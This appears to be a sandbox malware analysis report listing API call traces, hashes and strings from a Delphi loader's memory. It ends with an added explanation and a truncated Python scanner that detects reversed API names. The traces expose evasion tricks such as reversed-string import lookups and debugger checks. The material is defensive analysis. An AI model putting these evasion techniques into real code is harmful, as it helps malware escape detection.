• RegOpenKeyExA.ADVAPI32(80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 02D335BA
• RegQueryValueExA.ADVAPI32(?,FPUMaskValue,00000000,00000000,?,00000004,00000000,02D33609,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 02D335ED
• RegCloseKey.ADVAPI32(?,02D33610,00000000,?,00000004,00000000,02D33609,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 02D33603
Strings
Memory Dump Source
• Source File: 00000000.00000002.2268216794.0000000002D31000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D30000, based on PE: true
• Associated: 00000000.00000002.2268192586.0000000002D30000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2268329674.0000000002D5E000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2268573448.0000000002DB7000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2268573448.0000000002E2D000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2268573448.0000000002EAB000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2268573448.0000000002EAE000.00000040.00001000.00020000.00000000.sdmp
• API ID: CloseOpenQueryValue
• String ID: FPUMaskValue$SOFTWARE\Borland\Delphi\RTL
• API String ID: 3677997916-4173385793
• Opcode ID: 36f1b45551d5abb6c89c8f3bf791c5b0afc104859523676012e5b5446a6fec6e
• Instruction ID: 67191a06f55b87505d0a3b87b0d5c8244a7a2bb450b5011489b4b256150d079a
• Opcode Fuzzy Hash: 36f1b45551d5abb6c89c8f3bf791c5b0afc104859523676012e5b5446a6fec6e
• Instruction Fuzzy Hash: B501B975D40358BEEB52DB90DD02BB977ECEB08710F1045A1FA04D6780E6B49E14CAA9
APIs
• GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02D482FC,?,?,00000000,00000000,?,02D48215,00000000,KernelBASE,00000000,00000000,02D4823C), ref: 02D482C1
• GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02D482C7
• GetProcAddress.KERNEL32(?,?), ref: 02D482D9
Strings
Memory Dump Source
• Source File: 00000000.00000002.2268216794.0000000002D31000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D30000, based on PE: true
• Associated: 00000000.00000002.2268192586.0000000002D30000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2268329674.0000000002D5E000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2268573448.0000000002DB7000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2268573448.0000000002E2D000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2268573448.0000000002EAB000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2268573448.0000000002EAE000.00000040.00001000.00020000.00000000.sdmp
• API ID: AddressProc$HandleModule
• String ID: Kernel32$sserddAcorPteG
• API String ID: 667068680-1372893251
• Opcode ID: ea1300faae385f023e297f38bf4d2786d65c0f70951bca889cf03bc35498be07
• Instruction ID: d25250de8dea1f6486aacbf6cf489940b7336572fe06927e3f4667ae8e90dfed
• Opcode Fuzzy Hash: ea1300faae385f023e297f38bf4d2786d65c0f70951bca889cf03bc35498be07
• Instruction Fuzzy Hash: 31014F76A44344EFEB02EBA4EC51A9EB7EEEB89B40F514460A840D7740DA74AD04DA74
                                                                                                                        APIs
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2268573448.0000000002DB7000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D30000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2268192586.0000000002D30000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268216794.0000000002D31000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268329674.0000000002D5E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268573448.0000000002E2D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268573448.0000000002EAB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268573448.0000000002EAE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_2d30000_jW3NEKvxH1.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: _free
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 269201875-0
                                                                                                                        • Opcode ID: 7bd75c35ecc30b271b00b77e92f4063212cf76abbfff81b413b55d476d69b5fb
                                                                                                                        • Instruction ID: 76d2e0aa2b25d81f30b37398ff8ab35982df008e990378e42c254018a25e565b
                                                                                                                        • Opcode Fuzzy Hash: 7bd75c35ecc30b271b00b77e92f4063212cf76abbfff81b413b55d476d69b5fb
                                                                                                                        • Instruction Fuzzy Hash: 9B51C171A00704AFDB609F25C841B6A77F5EF48728F16456AEA09DB3A0E735DE01CF98
                                                                                                                        APIs
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2268573448.0000000002DB7000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D30000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2268192586.0000000002D30000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268216794.0000000002D31000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268329674.0000000002D5E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268573448.0000000002E2D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268573448.0000000002EAB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268573448.0000000002EAE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_2d30000_jW3NEKvxH1.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: _free
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 269201875-0
                                                                                                                        • Opcode ID: f0a2e76299140c1b889b6a2776586b742041be663085ede9ef76686f57abf0cb
                                                                                                                        • Instruction ID: 96285ce173783187f184f61746e7fbd83da36e3ecfce7d0074626a3971be4b8b
                                                                                                                        • Opcode Fuzzy Hash: f0a2e76299140c1b889b6a2776586b742041be663085ede9ef76686f57abf0cb
                                                                                                                        • Instruction Fuzzy Hash: C741C536A00200DFCB24DF78C880A5AB7F6EF84714F168569EA59EB351DB31ED01CB84
                                                                                                                        APIs
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2268573448.0000000002DB7000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D30000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2268192586.0000000002D30000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268216794.0000000002D31000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268329674.0000000002D5E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268573448.0000000002E2D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268573448.0000000002EAB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268573448.0000000002EAE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_2d30000_jW3NEKvxH1.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: __dosmaperr$_free
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 242264518-0
                                                                                                                        • Opcode ID: 7dca9c723f0a3f3e5eee78a7163c4708e0db19878e5bf6bf14be5ff931373868
                                                                                                                        • Instruction ID: 01b89acfb6f508000e43900650b1773413e367722fca6b2b0181eb722bb4998c
                                                                                                                        • Opcode Fuzzy Hash: 7dca9c723f0a3f3e5eee78a7163c4708e0db19878e5bf6bf14be5ff931373868
                                                                                                                        • Instruction Fuzzy Hash: DB31C27280420ABFDF51AFA49C44DAE3B69EF05322F160169FE1057395EB30CD10DBA8
                                                                                                                        APIs
                                                                                                                        • GetThreadLocale.KERNEL32(?,00000000,02D3AAE7,?,?,00000000), ref: 02D3AA68
                                                                                                                          • Part of subcall function 02D3A7C4: GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 02D3A7E2
                                                                                                                        • GetThreadLocale.KERNEL32(00000000,00000004,00000000,02D3AAE7,?,?,00000000), ref: 02D3AA98
                                                                                                                        • EnumCalendarInfoA.KERNEL32(Function_0000A99C,00000000,00000000,00000004), ref: 02D3AAA3
                                                                                                                        • GetThreadLocale.KERNEL32(00000000,00000003,00000000,02D3AAE7,?,?,00000000), ref: 02D3AAC1
                                                                                                                        • EnumCalendarInfoA.KERNEL32(Function_0000A9D8,00000000,00000000,00000003), ref: 02D3AACC
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2268216794.0000000002D31000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D30000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2268192586.0000000002D30000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268329674.0000000002D5E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268573448.0000000002DB7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268573448.0000000002E2D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268573448.0000000002EAB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268573448.0000000002EAE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_2d30000_jW3NEKvxH1.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: Locale$InfoThread$CalendarEnum
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 4102113445-0
                                                                                                                        • Opcode ID: f12e6ca062d604584128a2b94f7b88e1a750d9d7b79ffcd5e68ea27b617aa245
                                                                                                                        • Instruction ID: d1216f37158fd6bc9a4f76e68bac43785d6581d62a65e3aa25a1110fca2efc7b
                                                                                                                        • Opcode Fuzzy Hash: f12e6ca062d604584128a2b94f7b88e1a750d9d7b79ffcd5e68ea27b617aa245
                                                                                                                        • Instruction Fuzzy Hash: 2701F2B63042847FF613AB78DD11F6A735DDB83720F5105A0F441A67C0D665DE008AB8
                                                                                                                        APIs
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2268573448.0000000002DB7000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D30000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2268192586.0000000002D30000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268216794.0000000002D31000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268329674.0000000002D5E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268573448.0000000002E2D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268573448.0000000002EAB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268573448.0000000002EAE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_2d30000_jW3NEKvxH1.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: _free
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 269201875-0
                                                                                                                        • Opcode ID: 24d082c4c32556380d94a426a0797d769337f58152c77e2724906da83e703e03
                                                                                                                        • Instruction ID: e327bddea48fff2b810474520bf52f45202f84530c51419081abda1ecefdaae4
                                                                                                                        • Opcode Fuzzy Hash: 24d082c4c32556380d94a426a0797d769337f58152c77e2724906da83e703e03
                                                                                                                        • Instruction Fuzzy Hash: 26F01232545300ABC670EB55F8C5D1673EEEA41718BA55819F50CD7AD0CB31FCD28AB8
                                                                                                                        APIs
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2268573448.0000000002DB7000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D30000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2268192586.0000000002D30000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268216794.0000000002D31000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268329674.0000000002D5E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268573448.0000000002E2D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268573448.0000000002EAB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268573448.0000000002EAE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_2d30000_jW3NEKvxH1.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: __dosmaperr
                                                                                                                        • String ID: H
                                                                                                                        • API String ID: 2332233096-2852464175
                                                                                                                        • Opcode ID: b64a76ded07e6414476391b57ad8ab2edcfe93df9d200e18b46d3283e817940b
                                                                                                                        • Instruction ID: 09e171a67e64edd8930d075b5198bd7d90a917e7e79f66acfe36efbbb4a5b37e
                                                                                                                        • Opcode Fuzzy Hash: b64a76ded07e6414476391b57ad8ab2edcfe93df9d200e18b46d3283e817940b
                                                                                                                        • Instruction Fuzzy Hash: 07A136319441088FCF19EFA8D891BAE7BB1EB06324F14525EE8159B3E1CB318993CB65
                                                                                                                        APIs
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2268573448.0000000002DB7000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D30000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2268192586.0000000002D30000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268216794.0000000002D31000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268329674.0000000002D5E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268573448.0000000002E2D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268573448.0000000002EAB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268573448.0000000002EAE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_2d30000_jW3NEKvxH1.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: _free_strpbrk
                                                                                                                        • String ID: *?$.
                                                                                                                        • API String ID: 3300345361-3972193922
                                                                                                                        • Opcode ID: 5e5281a7710df1af016e28c269081ecff319cf0b763ae5275be817dad69de84b
                                                                                                                        • Instruction ID: 94b5a8ea02575379959e66d15225c60afad846f7e52e7ccae84a4090d393685a
                                                                                                                        • Opcode Fuzzy Hash: 5e5281a7710df1af016e28c269081ecff319cf0b763ae5275be817dad69de84b
                                                                                                                        • Instruction Fuzzy Hash: A451C475E4010AAFDF14CFA9C980AADB7F5EF48314F25816AD954E7380E7319A42CF54
                                                                                                                        APIs
                                                                                                                        • GetThreadLocale.KERNEL32(?,00000000,02D3ACD0,?,?,?,?,00000000,00000000,00000000,00000000,00000000), ref: 02D3AB2F
                                                                                                                          • Part of subcall function 02D3A7C4: GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 02D3A7E2
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2268216794.0000000002D31000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D30000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2268192586.0000000002D30000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268329674.0000000002D5E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268573448.0000000002DB7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268573448.0000000002E2D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268573448.0000000002EAB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268573448.0000000002EAE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_2d30000_jW3NEKvxH1.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: Locale$InfoThread
                                                                                                                        • String ID: eeee$ggg$yyyy
                                                                                                                        • API String ID: 4232894706-1253427255
                                                                                                                        • Opcode ID: 11c507ccdf55fe4073ebe27743758109c74398c83fb94b6c7a7492ca91e288df
                                                                                                                        • Instruction ID: 50f5e9b8fd951a66d95737f850427b849df6dad1ea220644c7b385b1a864c8cd
                                                                                                                        • Opcode Fuzzy Hash: 11c507ccdf55fe4073ebe27743758109c74398c83fb94b6c7a7492ca91e288df
                                                                                                                        • Instruction Fuzzy Hash: 1F41CFB97041484BDB13EB79C8906BEB3EBEF86200F144526E4D2C7344EA79DD01CAB5
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 02DEAE35: __onexit.LIBCMT ref: 02DEAE3B
                                                                                                                        • __Init_thread_footer.LIBCMT ref: 02DB8D4C
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2268573448.0000000002DB7000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D30000, based on PE: true
                                                                                                                         • Associated: 00000000.00000002.2268192586.0000000002D30000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                         • Associated: 00000000.00000002.2268216794.0000000002D31000.00000020.00001000.00020000.00000000.sdmp
                                                                                                                         • Associated: 00000000.00000002.2268329674.0000000002D5E000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                         • Associated: 00000000.00000002.2268573448.0000000002E2D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                         • Associated: 00000000.00000002.2268573448.0000000002EAB000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                         • Associated: 00000000.00000002.2268573448.0000000002EAE000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_2d30000_jW3NEKvxH1.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: Init_thread_footer__onexit
                                                                                                                        • String ID: T=G$p[G$>G
                                                                                                                        • API String ID: 1881088180-2601783060
                                                                                                                        • Opcode ID: 8f70ea2b40fb44211d0b69bbfe51e678a1d722ca5741e51af6e8456a38407156
                                                                                                                        • Instruction ID: dd08e69424575007b4ba41027c196edd908c43791586d3fbd54d6880c53786ad
                                                                                                                        • Opcode Fuzzy Hash: 8f70ea2b40fb44211d0b69bbfe51e678a1d722ca5741e51af6e8456a38407156
                                                                                                                        • Instruction Fuzzy Hash: BC418131504640CBC626FB24D8B4AEE73AAEF85311F40452EE54B863E0DF74AD49CE69
                                                                                                                        APIs
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2268573448.0000000002DB7000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D30000, based on PE: true
                                                                                                                         • Associated: 00000000.00000002.2268192586.0000000002D30000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                         • Associated: 00000000.00000002.2268216794.0000000002D31000.00000020.00001000.00020000.00000000.sdmp
                                                                                                                         • Associated: 00000000.00000002.2268329674.0000000002D5E000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                         • Associated: 00000000.00000002.2268573448.0000000002E2D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                         • Associated: 00000000.00000002.2268573448.0000000002EAB000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                         • Associated: 00000000.00000002.2268573448.0000000002EAE000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_2d30000_jW3NEKvxH1.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: _wcslen
                                                                                                                        • String ID: XF$$$<XF
                                                                                                                        • API String ID: 176396367-2187388861
                                                                                                                        • Opcode ID: db32128b02a1ccbc70c4588b7822f6c775a314ba91b6364ff21a4127614396bf
                                                                                                                        • Instruction ID: fde29fb745098533f9f4e0d12c41cedb0dfc27e7d990a058079b00f611e065fc
                                                                                                                        • Opcode Fuzzy Hash: db32128b02a1ccbc70c4588b7822f6c775a314ba91b6364ff21a4127614396bf
                                                                                                                        • Instruction Fuzzy Hash: 7811A1B2904258EADB14FBA4D854BDEB7BDDF49710F51006AE905F3240EB789E048B79
                                                                                                                        APIs
                                                                                                                        • GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,02D4823C,?,?,00000000,?,02D47A7E,ntdll,00000000,00000000,02D47AC3,?,?,00000000), ref: 02D4820A
                                                                                                                          • Part of subcall function 02D48274: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02D482FC,?,?,00000000,00000000,?,02D48215,00000000,KernelBASE,00000000,00000000,02D4823C), ref: 02D482C1
                                                                                                                          • Part of subcall function 02D48274: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02D482C7
                                                                                                                          • Part of subcall function 02D48274: GetProcAddress.KERNEL32(?,?), ref: 02D482D9
                                                                                                                        • GetModuleHandleA.KERNELBASE(?), ref: 02D4821E
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2268216794.0000000002D31000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D30000, based on PE: true
                                                                                                                         • Associated: 00000000.00000002.2268192586.0000000002D30000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                         • Associated: 00000000.00000002.2268329674.0000000002D5E000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                         • Associated: 00000000.00000002.2268573448.0000000002DB7000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                         • Associated: 00000000.00000002.2268573448.0000000002E2D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                         • Associated: 00000000.00000002.2268573448.0000000002EAB000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                         • Associated: 00000000.00000002.2268573448.0000000002EAE000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_2d30000_jW3NEKvxH1.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: HandleModule$AddressProc
                                                                                                                        • String ID: AeldnaHeludoMteG$KernelBASE
                                                                                                                        • API String ID: 1883125708-1952140341
                                                                                                                        • Opcode ID: c0f0fa6983baace7b61c2149d45570b93d763b0e6631acf109376ca1e4c24f43
                                                                                                                        • Instruction ID: 9170d901eb91458b37fcbcc858864444556dd3fb16972c5d0b6a3d7723ac3359
                                                                                                                        • Opcode Fuzzy Hash: c0f0fa6983baace7b61c2149d45570b93d763b0e6631acf109376ca1e4c24f43
                                                                                                                        • Instruction Fuzzy Hash: D2F06271A44744EFEB02EFA4EC51D5AB7EDE78A740B518860E800D3710DA74AE149A74
                                                                                                                        APIs
                                                                                                                        • GetModuleHandleW.KERNEL32(KernelBase,?,02D4FAEB,UacInitialize,02DB7380,02D5B7B8,OpenSession,02DB7380,02D5B7B8,ScanBuffer,02DB7380,02D5B7B8,ScanString,02DB7380,02D5B7B8,Initialize), ref: 02D4F6EE
                                                                                                                        • GetProcAddress.KERNEL32(00000000,IsDebuggerPresent), ref: 02D4F700
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2268216794.0000000002D31000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D30000, based on PE: true
                                                                                                                         • Associated: 00000000.00000002.2268192586.0000000002D30000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                         • Associated: 00000000.00000002.2268329674.0000000002D5E000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                         • Associated: 00000000.00000002.2268573448.0000000002DB7000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                         • Associated: 00000000.00000002.2268573448.0000000002E2D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                         • Associated: 00000000.00000002.2268573448.0000000002EAB000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                         • Associated: 00000000.00000002.2268573448.0000000002EAE000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_2d30000_jW3NEKvxH1.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: AddressHandleModuleProc
                                                                                                                        • String ID: IsDebuggerPresent$KernelBase
                                                                                                                        • API String ID: 1646373207-2367923768
                                                                                                                        • Opcode ID: 5ffd30a360041c528af067c0c64ae449872bfbae13f08419d0eb2b57c067c367
                                                                                                                        • Instruction ID: 487e95ade72bcf5cddc2cb9a9649ee83da65cc6b51ba95961dc6b1e062d2d704
                                                                                                                        • Opcode Fuzzy Hash: 5ffd30a360041c528af067c0c64ae449872bfbae13f08419d0eb2b57c067c367
                                                                                                                        • Instruction Fuzzy Hash: A4D012A13503902FBE0073F42CC4D1903CCC55556D7300E60B022C67A2E9AECC199068
                                                                                                                        APIs
                                                                                                                        • GetModuleHandleA.KERNEL32(kernel32.dll,?,02D5D10B,00000000,02D5D11E), ref: 02D3C47A
                                                                                                                        • GetProcAddress.KERNEL32(00000000,GetDiskFreeSpaceExA), ref: 02D3C48B
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2268216794.0000000002D31000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D30000, based on PE: true
                                                                                                                         • Associated: 00000000.00000002.2268192586.0000000002D30000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                         • Associated: 00000000.00000002.2268329674.0000000002D5E000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                         • Associated: 00000000.00000002.2268573448.0000000002DB7000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                         • Associated: 00000000.00000002.2268573448.0000000002E2D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                         • Associated: 00000000.00000002.2268573448.0000000002EAB000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                         • Associated: 00000000.00000002.2268573448.0000000002EAE000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_2d30000_jW3NEKvxH1.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: AddressHandleModuleProc
                                                                                                                        • String ID: GetDiskFreeSpaceExA$kernel32.dll
                                                                                                                        • API String ID: 1646373207-3712701948
                                                                                                                        • Opcode ID: f5df201c206440cbff7498ac06776def00f90207456a373769a10bca14162dfd
                                                                                                                        • Instruction ID: 7b28557d4459771666aa13eb510591af09e324b4f5e669b400426817c2a6ab5f
                                                                                                                        • Opcode Fuzzy Hash: f5df201c206440cbff7498ac06776def00f90207456a373769a10bca14162dfd
                                                                                                                        • Instruction Fuzzy Hash: 5BD05EE0A507546AF602BBB5E8806313BD8D348360F008866E40165300E7FAAC14CF68
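The three records above show the loader resolving its imports at runtime: GetModuleHandleA/GetProcAddress driven by the string "AeldnaHeludoMteG" (which is "GetModuleHandleA" spelled backwards), a GetProcAddress lookup of IsDebuggerPresent in KernelBase, and a lookup of GetDiskFreeSpaceExA in kernel32.dll. A reversed API name defeats a plain strings or YARA pass that looks for the forward spelling, yet costs the code nothing to undo before the lookup. The scanner below is an added example written for this page, not part of the Joe Sandbox report or of the analysed sample: it walks a raw memory region and reports watched Win32 API names in either orientation. The three forward names and the reversed string are taken from the records above; the remaining watch-list entries, the `scan`/`reversed_names` helpers and the `SAMPLE_DUMP` bytes are constructed for the example.

```python
"""
Added example (not from the Joe Sandbox report): find Win32 API names that are
stored reversed in a memory region, as "AeldnaHeludoMteG" is for
GetModuleHandleA above, plus plaintext names of APIs that are resolved at
runtime through GetProcAddress (IsDebuggerPresent, GetDiskFreeSpaceExA above).
"""
import re
from typing import List, Tuple

# The first four names appear in the function records above; the rest is a
# small extra watch-list chosen for this example (assumption: worth flagging
# in any dump of a loader that resolves imports dynamically).
WATCHED_APIS = (
    "GetModuleHandleA",
    "GetProcAddress",
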